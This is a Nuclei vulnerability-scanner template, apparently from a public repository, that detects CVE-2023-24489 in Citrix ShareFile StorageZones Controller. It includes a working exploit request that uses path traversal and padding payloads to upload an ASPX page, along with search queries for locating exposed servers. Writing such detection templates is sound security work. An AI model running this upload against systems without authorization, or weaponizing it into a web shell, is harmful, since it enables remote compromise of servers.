nuclei-templates/http/cves/2023/CVE-2023-24489.yaml

69 lines
2.7 KiB
YAML
Raw Permalink Normal View History

id: CVE-2023-24489
info:
name: Citrix ShareFile StorageZones Controller - Unauthenticated Remote Code Execution
author: DhiyaneshDK,dwisiswant0
severity: critical
description: |
A vulnerability has been discovered in the customer-managed ShareFile storage zones controller which, if exploited, could allow an unauthenticated attacker to remotely compromise the customer-managed ShareFile storage zones controller.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
2023-09-06 11:43:37 +00:00
remediation: |
Apply the necessary security patches or updates provided by Citrix to mitigate this vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-24489
- https://blog.assetnote.io/2023/07/04/citrix-sharefile-rce/
2023-08-31 11:46:18 +00:00
- https://support.citrix.com/article/CTX559517/sharefile-storagezones-controller-security-update-for-cve202324489
- https://github.com/20142995/sectool
- https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-24489
cwe-id: CWE-284,NVD-CWE-Other
2024-05-31 19:23:20 +00:00
epss-score: 0.9742
epss-percentile: 0.99933
2023-09-06 11:43:37 +00:00
cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:*
metadata:
verified: true
2023-09-06 11:43:37 +00:00
max-request: 256
vendor: citrix
2023-08-31 11:46:18 +00:00
product: sharefile_storage_zones_controller
shodan-query:
- title:"ShareFile Storage Server"
- http.title:"sharefile storage server"
2024-05-31 19:23:20 +00:00
fofa-query: title="sharefile storage server"
google-query: intitle:"sharefile storage server"
2024-03-19 15:20:31 +00:00
tags: cve2023,cve,sharefile,rce,intrusive,fileupload,fuzz,kev,citrix
variables:
fileName: '{{rand_base(8)}}'
http:
- raw:
- |
POST /documentum/upload.aspx?parentid={{url_encode(padding)}}&raw=1&unzip=on&uploadid={{fileName}}\..\..\..\cifs&filename={{fileName}}.aspx HTTP/1.1
Host: {{Hostname}}
<%@ Page Language="C#" Debug="true" Trace="false" %>
<script Language="c#" runat="server">
void Page_Load(object sender, EventArgs e)
{
Response.Write("{{randstr}}");
}
</script>
payloads:
padding: helpers/payloads/citrix_paddings.txt
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'body == "ERROR: The method or operation is not implemented."'
- 'status_code == 200'
condition: and
extractors:
- type: dsl
dsl:
- 'BaseURL+ "/cifs/" + fileName + ".aspx"'
# digest: 4a0a0047304502201a2c5ec01132611d909015166f5c83f43e8236a17f3b971ba3d6c194d92e4113022100e81878e9368d2eaa8aab6b3d045aeeea524badbf045c96811a05254f0279a619:922c64590222798bb761d5b6d8e72950